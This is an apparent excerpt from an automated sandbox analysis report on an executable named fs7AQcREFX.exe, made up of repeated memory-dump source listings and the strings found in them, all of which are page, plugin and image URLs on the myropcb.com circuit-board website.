                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.0.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 